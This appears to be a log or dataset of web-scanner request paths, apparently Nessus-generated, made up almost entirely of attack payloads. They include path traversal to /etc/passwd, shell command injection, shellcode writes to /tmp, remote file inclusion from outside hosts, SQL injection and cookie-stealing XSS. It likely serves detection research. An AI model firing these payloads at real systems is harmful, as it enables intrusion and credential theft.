/awstats/awstats.pl?migrate=|echo;/bin/echo -en "zj\0003x\0315\0200xp1\0322\0262\0377\0266\0377\0001\0320" >> /tmp/ysooqnjtxq0;echo|awstats824539.txt
/help.php?q=&ver >q32627628&rem
/news.php?scriptpath=http://192.168.202.118:8080/moclyxlwqyfjnp??
/zroo33l4.exe?
/examples/jsp/num/search.php?searchstring=
/manager/server.pt?open=space&name=";}
/cgi-bin/check_user_id.php?user_id=
/raanw4ia.kspx?
/javascript/past.exe
/main.php?logout="|ping,-w,9000,-n,1,4.3.2.1|rem,
/scripts/shopper.cgi?newpage=../../../../../../etc/passwd
/ybz5rz7a.pl?
/byrg33fw.exe?
/examples/jsp/security/protected/.j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.swp
/examples/jsp/colors/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd
/zorum/index.php?method=<script>alert('vulnerable')</script>
/scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il?
/o1zj4u9v.exe?
/scripts/udblphlq4nln.php
/scriptcontent/
/azcrfs8d.do?
/vb-script/
/vwmg565s.jsp?
/scripts/sitemap.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt??
/en-us/s7qus4g3.cfm?
/main.php?stuff=";sleep 8 #
/top.php?stuff='\x0auname\x09>q46955555\x09#
/help.php?q="del q41912626&rem
/examples/jsp/colors/index.php?gadget=glossary&action=view&term=
/esmozg5d.idc?
/main.php?frm_daynight=day&frm_passwd=&frm_referer=q49168279&frm_user=&scr_height=&scr_width=
/php/php.exe?c:\winnt\boot.ini
/scripts/desktopmodules/bdpdt/uploadfilepopup.aspx
/examples/jsp/checkbox/fxm.exe
/top.php?stuff="ping\x09-w\x0910000\x09-n\x091\x094.3.2.1&rem\x09
/scripts/admin/objects.inc.php4?server[path]=http://xxxxxx&server[language_file]=nessus.php
/manager/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;
/suse linux pwdutils 'chfn' utility local privilege escalation exploit/
/q703m78q.aspx?
/j734qobz.php?
/7u1pb2xi.kspx?
/recordings/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd
/ghswfouu.cgi?
/en-us/account/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331909349
/main.php?stuff="&ping\x0c-w\x0c7000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c
/scripts/rihzp7swr3p6.cgi
/edv3mapy.aspx?
/examples/jsp/jsp2/jspx/texis.exe/nessus
/cgi/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|
/examples/jsp/error/index.php?id='
/cgi-win/fileseek.cgi?foot=;cat /etc/passwd&head=
/
/main.php?logout="ping;-w;11000;-n;1;1.2.3.4&rem;
/x2gyorli.kspx?
/subscriptions.lib
/weq93ppb.cgi?
/query.idq?citemplate=../../../../../../../../../../winnt/win.ini
/examples/jsp/jsp2/el/rot13sj.cgi?/etc/passwd
/l4fz1dqw.html?
/cacti/core/api.php?t_path_core=/etc/passwd\x00
/top.php?stuff='\x0ddel q76686472 #
/9ko6m4c8.dll?
/bl8sefdm.fts?
/t578vqea.kspx?
/examples/jsp/checkbox/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl
/main.php?stuff="ver >q63222197&rem
/eei78ore.exe?
/cgi-bin/nul/../../../../../../../../../winnt/system32/ipconfig.exe
/examples/jsp/jsp2/jspx/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00
/d5a5renl.jspa?
/scripts/zq9frlz6fcfp.sh
/main.php?stuff='\x0asleep 8 #
/cgi-bin/default.asp?istate=duclassmate_sql_injections.nasl'&nstate=utah
/"britney spears"/
/phpmyadmin/pfdispaly?../../../../../../etc/passwd
/if69ddo1.cfc?
/zqqemp6j.exe?
/javascript/postpaid.exe
/en-us/esmozg5d.php3?
/subscriptions.lst
/en-us/account/search.jsp?q=%"
/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/frznctvhi0i5?\x00
/0z575z74.aspx?
/pda's / handheld pc's /
/b1q8bywu.asp?
/examples/servlets/servlet/sojourn.cgi?cat=../../../../../etc/passwd\x00
/webcgi/fileseek2.cgi?foot=&head=;cat /etc/passwd|
/examples/jsp/checkbox/data/fetch.php?page='
/scripts/bsml.pl?action=sm
/ovcgi/getnnmdata.exe
/clonazepam-description/
/examples/jsp/colors/mylog.html?screen=/etc/passwd
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/&frm_user=&scr_height=q24745466&scr_width=
/ny1b3qq4.cgi?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+d0+8b+04+91+01+f0+89+45+f0+eb+06+43+3b+5d+f4+72+d4+89+ec+61+8b+44+24+d0+c2++>>ctdn
/examples/jsp/cal/file.php?path=/etc/passwd\x00
/en-us/9kr0ih0v.do?
/e9rx3ya4.mscgi?
/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331919224,4--&blog=1
/examples/jsp/checkbox/commerce.cgi?page=../../../../../etc/passwd\x00index.html
/cgi-914/query?mss=../config
/j2kdmfw4.x?
/help.php?q="&ping\x0b-w\x0b8000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b
/help.php?q='sleep 9 #
/javascript/batch.exe
/scripts/notify?from=nessus"|id"
/main.php?stuff="&ping\x0b-w\x0b9000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b
/viewcvs.cgi/?cvsroot=
/examples/jsp/colors/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00
/javascript/cpp.exe
/main.php?logout="&ping\x09-w\x099000\x09-n\x091\x094.3.2.1&rem\x09
/examples/jsp/sessions/cgiwrap/cgiwrap_error_page_handling_xss.nasl
/phpmyadmin/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1
/main.php?stuff="\x0duname\x09#
/dda2qr7j.idc?
/fo564rei.do?
/manager/session/login.php?dest=nessus">
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); %73%63%72%69%70%74>
<--`
--!>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<